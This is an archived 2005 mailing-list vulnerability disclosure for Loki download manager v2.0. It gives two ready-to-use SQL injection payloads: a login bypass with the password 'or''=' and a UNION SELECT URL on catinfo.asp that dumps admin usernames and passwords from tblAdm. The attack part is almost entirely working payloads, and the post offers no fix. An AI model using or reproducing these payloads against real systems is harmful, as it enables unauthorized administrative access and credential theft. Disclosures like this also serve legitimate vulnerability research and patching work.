Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: 8 Jun 2005 16:25:37 -0000
From: [email protected]
To: [email protected]
Subject: 2 SQL injection in Loki download manager v2.0
X-Virus-Scanned: antivirus-gw at tyumen.ru

hi all

tow SQL injection in Loki download manager

1. in http://localhost/adm/default.asp

user: anyuser
pass: 'or''='

2. in http://localhost/downmancv/catinfo.asp?cat=' union select null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM tblAdm '

and u will have user and pass h4ve F4n

Salmanooh

[email protected]

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: